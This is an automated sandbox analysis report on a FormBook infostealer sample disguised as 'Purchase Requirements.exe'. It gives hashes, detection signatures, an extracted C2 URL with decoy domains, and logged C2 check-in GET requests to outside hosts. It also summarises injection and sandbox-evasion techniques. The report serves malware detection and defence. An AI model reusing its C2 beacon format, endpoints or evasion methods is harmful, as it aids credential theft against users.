Windows Analysis Report Purchase Requirements.exe

Overview

General Information

Sample Name: Purchase Requirements.exe
Analysis ID: 458827
MD5: 5bd387d81d1d7d7fd4dbeabebbb46b1b
SHA1: a832689604786e188bcc5c9020c28f693b2eb460
SHA256: fe7e173fd8a3d646508573bb2f7ef52f7efd25a8e2aef1b754dcf95ceb797f8a
Tags: exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe ReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: Purchase Requirements.exe Virustotal: Detection: 33% Perma Link
Source: Purchase Requirements.exe ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Purchase Requirements.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.MSBuild.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: Purchase Requirements.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Purchase Requirements.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000007.00000002.770164401.00000000013C0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.920589747.00000000043F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, colorcpl.exe
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then pop esi 7_2_00415806
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop esi 15_2_02B05806

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 162.241.85.227:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 162.241.85.227:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 162.241.85.227:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.narrowpathwc.com/n8ba/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.thefitflect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=gDLflU22h4aNrBeOW4VXQ696ddSmWDeh6I9xRo3nz/h3BsDrL/4ZQIL6r35kaA0glkfe&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.mariasmoworldwide.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=e60qEcsD/l81wB0bMHsW7u7BjuDaTcxFYqyxe5BzllGz/xR5NT7a3L6d+84tw9tNKT87&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.goldenstatelabradoodles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.mynjelderlaw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=9vokcWjvDccQU4MCm09VADFSZD35cLZafv0mNDf58+cuq+V2woxjt+NJE4WV9inYEz7b&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.theredcymbalsco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.138
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.138
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.138
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.138
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.138
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.138
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.138
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.8.70
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.thefitflect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=gDLflU22h4aNrBeOW4VXQ696ddSmWDeh6I9xRo3nz/h3BsDrL/4ZQIL6r35kaA0glkfe&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.mariasmoworldwide.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=e60qEcsD/l81wB0bMHsW7u7BjuDaTcxFYqyxe5BzllGz/xR5NT7a3L6d+84tw9tNKT87&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.goldenstatelabradoodles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.mynjelderlaw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=9vokcWjvDccQU4MCm09VADFSZD35cLZafv0mNDf58+cuq+V2woxjt+NJE4WV9inYEz7b&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.theredcymbalsco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.thefitflect.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Tue, 03 Aug 2021 17:27:40 GMTServer: ApacheX-Powered-By: PHP/7.4.21Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/"Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="
Source: colorcpl.exe, 0000000F.00000002.921199277.0000000004AA2000.00000004.00000001.sdmp String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: Purchase Requirements.exe, 00000000.00000002.693037255.0000000002851000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000008.00000000.733281418.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: Purchase Requirements.exe, 00000000.00000003.658862598.00000000009DB000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Purchase Requirements.exe, 00000000.00000002.688507920.00000000009D0000.00000004.00000040.sdmp String found in binary or memory: http://www.fontbureau.com8
Source: Purchase Requirements.exe, 00000000.00000002.688507920.00000000009D0000.00000004.00000040.sdmp String found in binary or memory: http://www.fontbureau.comionoB
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Purchase Requirements.exe, 00000000.00000003.658484040.00000000009DB000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/-e5
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Purchase Requirements.exe, 00000000.00000003.658349095.00000000009DB000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnTCr
Source: Purchase Requirements.exe, 00000000.00000003.658484040.00000000009DB000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cna
Source: Purchase Requirements.exe, 00000000.00000003.658402247.00000000009DB000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cna-e5
Source: Purchase Requirements.exe, 00000000.00000003.658349095.00000000009DB000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnn-u
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
